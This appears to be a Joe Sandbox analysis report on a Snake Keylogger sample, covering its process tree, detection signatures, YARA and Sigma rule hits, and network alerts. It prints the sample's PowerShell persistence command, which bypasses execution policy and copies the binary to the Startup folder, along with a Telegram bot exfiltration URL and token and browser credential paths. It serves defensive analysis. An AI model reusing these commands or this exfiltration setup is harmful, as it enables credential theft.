Edit tour

Windows Analysis Report
rOrders.scr.exe

Overview

General Information

Sample name:	rOrders.scr.exe
Analysis ID:	1590011
MD5:	1feb066e46d1beed60404a2a6adb3d5a
SHA1:	a8a8627b651f037647294992cef1dc0924a6abbb
SHA256:	2553adadd29af4148be4c10f1771573b149006815374121bb802fa7599ab06f4
Tags:	exeuser-Porcupine
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Copy file to startup via Powershell

Yara detected AntiVM3

Yara detected Snake Keylogger

AI detected suspicious sample

Bypasses PowerShell execution policy

Drops PE files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

rOrders.scr.exe (PID: 1848 cmdline: "C:\Users\user\Desktop\rOrders.scr.exe" MD5: 1FEB066E46D1BEED60404A2A6ADB3D5A)

powershell.exe (PID: 1520 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rOrders.scr.exe (PID: 4760 cmdline: "C:\Users\user\Desktop\rOrders.scr.exe" MD5: 1FEB066E46D1BEED60404A2A6ADB3D5A)

svchost.exe (PID: 4708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

00.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe" MD5: 1FEB066E46D1BEED60404A2A6ADB3D5A)

powershell.exe (PID: 2608 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

00.exe (PID: 7192 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe" MD5: 1FEB066E46D1BEED60404A2A6ADB3D5A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7880085226:AAFn59bjY_5aEtKKH3yN4wktDN454dzF1lM/sendMessage?chat_id=6055880871", "Token": "7880085226:AAFn59bjY_5aEtKKH3yN4wktDN454dzF1lM", "Chat_id": "6055880871", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.4557201022.0000000004391000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x12a4:$x1: $%SMTPDV$ 0x124c:$x3: %FTPDV$ 0x1270:$m2: Clipboard Logs ID 0x14ae:$m2: Screenshot Logs ID 0x15be:$m2: keystroke Logs ID 0x1898:$m3: SnakePW 0x1486:$m4: \SnakeKeylogger\
00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5981:$a1: get_encryptedPassword 0x5c6d:$a2: get_encryptedUsername 0x578d:$a3: get_timePasswordChanged 0x5888:$a4: get_passwordField 0x5997:$a5: set_encryptedPassword 0x6ffd:$a7: get_logins 0x6f60:$a10: KeyLoggerEventArgs 0x6bcb:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xa874:$x1: $%SMTPDV$ 0x9258:$x2: $#TheHashHere%& 0xa81c:$x3: %FTPDV$ 0x91f8:$x4: $%TelegramDv$ 0x6bcb:$x5: KeyLoggerEventArgs 0x6f60:$x5: KeyLoggerEventArgs 0xa840:$m2: Clipboard Logs ID 0xaa7e:$m2: Screenshot Logs ID 0xab8e:$m2: keystroke Logs ID 0xae68:$m3: SnakePW 0xaa56:$m4: \SnakeKeylogger\
00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3ac4:$x1: $%SMTPDV$ 0x24a8:$x2: $#TheHashHere%& 0x3a6c:$x3: %FTPDV$ 0x2448:$x4: $%TelegramDv$ 0x1b0:$x5: KeyLoggerEventArgs 0x3a90:$m2: Clipboard Logs ID 0x3cce:$m2: Screenshot Logs ID 0x3dde:$m2: keystroke Logs ID 0x40b8:$m3: SnakePW 0x3ca6:$m4: \SnakeKeylogger\
00000004.00000002.4536657049.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14971:$a1: get_encryptedPassword 0x14c5d:$a2: get_encryptedUsername 0x1477d:$a3: get_timePasswordChanged 0x14878:$a4: get_passwordField 0x14987:$a5: set_encryptedPassword 0x15fed:$a7: get_logins 0x15f50:$a10: KeyLoggerEventArgs 0x15bbb:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19864:$x1: $%SMTPDV$ 0x18248:$x2: $#TheHashHere%& 0x1980c:$x3: %FTPDV$ 0x181e8:$x4: $%TelegramDv$ 0x15bbb:$x5: KeyLoggerEventArgs 0x15f50:$x5: KeyLoggerEventArgs 0x19830:$m2: Clipboard Logs ID 0x19a6e:$m2: Screenshot Logs ID 0x19b7e:$m2: keystroke Logs ID 0x19e58:$m3: SnakePW 0x19a46:$m4: \SnakeKeylogger\
00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rOrders.scr.exe PID: 1848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rOrders.scr.exe PID: 1848	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: rOrders.scr.exe PID: 1848	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rOrders.scr.exe PID: 1848	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x17361:$a1: get_encryptedPassword 0x40a28:$a1: get_encryptedPassword 0x7ad2e:$a1: get_encryptedPassword 0x17643:$a2: get_encryptedUsername 0x40d0a:$a2: get_encryptedUsername 0x7b010:$a2: get_encryptedUsername 0x17177:$a3: get_timePasswordChanged 0x4083e:$a3: get_timePasswordChanged 0x7ab44:$a3: get_timePasswordChanged 0x17272:$a4: get_passwordField 0x40939:$a4: get_passwordField 0x7ac3f:$a4: get_passwordField 0x17377:$a5: set_encryptedPassword 0x40a3e:$a5: set_encryptedPassword 0x7ad44:$a5: set_encryptedPassword 0x42f15:$a7: get_logins 0x65fd1:$a7: get_logins 0x42e78:$a10: KeyLoggerEventArgs 0x65f34:$a10: KeyLoggerEventArgs 0x42ae3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: rOrders.scr.exe PID: 1848	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x42ae3:$x5: KeyLoggerEventArgs 0x42e78:$x5: KeyLoggerEventArgs 0x4377f:$x5: KeyLoggerEventArgs 0x43ae0:$x5: KeyLoggerEventArgs 0x65f34:$x5: KeyLoggerEventArgs 0x66615:$x5: KeyLoggerEventArgs 0x11fc9:$m2: Clipboard Logs ID 0x120cf:$m2: Screenshot Logs ID 0x12125:$m2: keystroke Logs ID 0x450a3:$m2: Clipboard Logs ID 0x451a9:$m2: Screenshot Logs ID 0x451ff:$m2: keystroke Logs ID 0x67bd8:$m2: Clipboard Logs ID 0x67cde:$m2: Screenshot Logs ID 0x67d34:$m2: keystroke Logs ID 0x1225a:$m3: SnakePW 0x45334:$m3: SnakePW 0x67e69:$m3: SnakePW 0x120bb:$m4: \SnakeKeylogger\ 0x45195:$m4: \SnakeKeylogger\ 0x67cca:$m4: \SnakeKeylogger\
Process Memory Space: rOrders.scr.exe PID: 4760	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rOrders.scr.exe PID: 4760	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rOrders.scr.exe PID: 4760	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x57870:$a1: get_encryptedPassword 0x57b52:$a2: get_encryptedUsername 0x57686:$a3: get_timePasswordChanged 0x57781:$a4: get_passwordField 0x57886:$a5: set_encryptedPassword 0x59d5d:$a7: get_logins 0x59cc0:$a10: KeyLoggerEventArgs 0x5992b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: rOrders.scr.exe PID: 4760	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5992b:$x5: KeyLoggerEventArgs 0x59cc0:$x5: KeyLoggerEventArgs 0x5a5c7:$x5: KeyLoggerEventArgs 0x5a928:$x5: KeyLoggerEventArgs 0x5beeb:$m2: Clipboard Logs ID 0x5bff1:$m2: Screenshot Logs ID 0x5c047:$m2: keystroke Logs ID 0x5c17c:$m3: SnakePW 0x5bfdd:$m4: \SnakeKeylogger\
Process Memory Space: 00.exe PID: 6444	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 00.exe PID: 6444	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: 00.exe PID: 7192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 00.exe PID: 7192	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.rOrders.scr.exe.3c99840.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1574b:$s1: UnHook 0x15752:$s2: SetHook 0x1575a:$s3: CallNextHook 0x15767:$s4: _hook
6.2.00.exe.4379840.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rOrders.scr.exe.3c78e10.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rOrders.scr.exe.3c78e10.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rOrders.scr.exe.3c78e10.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d71:$a1: get_encryptedPassword 0x1305d:$a2: get_encryptedUsername 0x12b7d:$a3: get_timePasswordChanged 0x12c78:$a4: get_passwordField 0x12d87:$a5: set_encryptedPassword 0x143ed:$a7: get_logins 0x14350:$a10: KeyLoggerEventArgs 0x13fbb:$a11: KeyLoggerEventArgsEventHandler
0.2.rOrders.scr.exe.3c78e10.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a61a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1984c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c7f:$a4: \Orbitum\User Data\Default\Login Data 0x1acbe:$a5: \Kometa\User Data\Default\Login Data
6.2.00.exe.42c8570.2.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x490b9:$x1: In$J$ct0r
0.2.rOrders.scr.exe.3c78e10.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1394b:$s1: UnHook 0x13952:$s2: SetHook 0x1395a:$s3: CallNextHook 0x13967:$s4: _hook
0.2.rOrders.scr.exe.3c78e10.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c64:$x1: $%SMTPDV$ 0x16648:$x2: $#TheHashHere%& 0x17c0c:$x3: %FTPDV$ 0x165e8:$x4: $%TelegramDv$ 0x13fbb:$x5: KeyLoggerEventArgs 0x14350:$x5: KeyLoggerEventArgs 0x17c30:$m2: Clipboard Logs ID 0x17e6e:$m2: Screenshot Logs ID 0x17f7e:$m2: keystroke Logs ID 0x18258:$m3: SnakePW 0x17e46:$m4: \SnakeKeylogger\
0.2.rOrders.scr.exe.2ed8d64.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2ddc:$a1: WriteProcessMemory 0xa2e68:$a1: WriteProcessMemory 0xa2f3c:$a4: VirtualAllocEx 0xa3160:$a4: VirtualAllocEx 0xa31e0:$a4: VirtualAllocEx
0.2.rOrders.scr.exe.3c99840.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rOrders.scr.exe.3c99840.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rOrders.scr.exe.3c99840.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a61a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1984c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c7f:$a4: \Orbitum\User Data\Default\Login Data 0x1acbe:$a5: \Kometa\User Data\Default\Login Data
0.2.rOrders.scr.exe.3c99840.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1394b:$s1: UnHook 0x13952:$s2: SetHook 0x1395a:$s3: CallNextHook 0x13967:$s4: _hook
0.2.rOrders.scr.exe.3c99840.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c64:$x1: $%SMTPDV$ 0x17c0c:$x3: %FTPDV$ 0x17c30:$m2: Clipboard Logs ID 0x17e6e:$m2: Screenshot Logs ID 0x17f7e:$m2: keystroke Logs ID 0x18258:$m3: SnakePW 0x17e46:$m4: \SnakeKeylogger\
6.2.00.exe.35b6fb8.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa5678:$a1: WriteProcessMemory 0xa5704:$a1: WriteProcessMemory 0xa57d8:$a4: VirtualAllocEx 0xa59fc:$a4: VirtualAllocEx 0xa5a7c:$a4: VirtualAllocEx
0.2.rOrders.scr.exe.2ed6524.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa561c:$a1: WriteProcessMemory 0xa56a8:$a1: WriteProcessMemory 0xa577c:$a4: VirtualAllocEx 0xa59a0:$a4: VirtualAllocEx 0xa5a20:$a4: VirtualAllocEx
6.2.00.exe.35b97f8.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2e38:$a1: WriteProcessMemory 0xa2ec4:$a1: WriteProcessMemory 0xa2f98:$a4: VirtualAllocEx 0xa31bc:$a4: VirtualAllocEx 0xa323c:$a4: VirtualAllocEx
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rOrders.scr.exe", ParentImage: C:\Users\user\Desktop\rOrders.scr.exe, ParentProcessId: 1848, ParentProcessName: rOrders.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 1520, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rOrders.scr.exe", ParentImage: C:\Users\user\Desktop\rOrders.scr.exe, ParentProcessId: 1848, ParentProcessName: rOrders.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 1520, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4708, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rOrders.scr.exe", ParentImage: C:\Users\user\Desktop\rOrders.scr.exe, ParentProcessId: 1848, ParentProcessName: rOrders.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 1520, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:31:16.035820+0100	2803305	3	Unknown Traffic	192.168.2.5	49708	104.21.32.1	443	TCP
2025-01-13T13:31:21.003403+0100	2803305	3	Unknown Traffic	192.168.2.5	49717	104.21.32.1	443	TCP
2025-01-13T13:31:25.043406+0100	2803305	3	Unknown Traffic	192.168.2.5	49723	104.21.32.1	443	TCP
2025-01-13T13:31:29.997818+0100	2803305	3	Unknown Traffic	192.168.2.5	49740	104.21.32.1	443	TCP
2025-01-13T13:31:37.974428+0100	2803305	3	Unknown Traffic	192.168.2.5	49794	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:31:14.236420+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-13T13:31:15.455053+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-13T13:31:16.767599+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	132.226.247.73	80	TCP
2025-01-13T13:31:28.111407+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49724	132.226.247.73	80	TCP
2025-01-13T13:31:29.455148+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49724	132.226.247.73	80	TCP
2025-01-13T13:31:30.752069+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49741	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rOrders.scr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Avira: detection malicious, Label: HEUR/AGEN.1309847

Found malware configuration

Source: 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7880085226:AAFn59bjY_5aEtKKH3yN4wktDN454dzF1lM/sendMessage?chat_id=6055880871", "Token": "7880085226:AAFn59bjY_5aEtKKH3yN4wktDN454dzF1lM", "Chat_id": "6055880871", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: rOrders.scr.exe	Virustotal: Detection: 56%			Perma Link
Source: rOrders.scr.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: rOrders.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: rOrders.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49727 version: TLS 1.0

Source: rOrders.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: rOrders.scr.exe, 00000000.00000002.4536710280.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000006.00000002.4564681810.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, 00.exe, 00000006.00000002.4536761451.0000000003271000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\	Jump to behavior
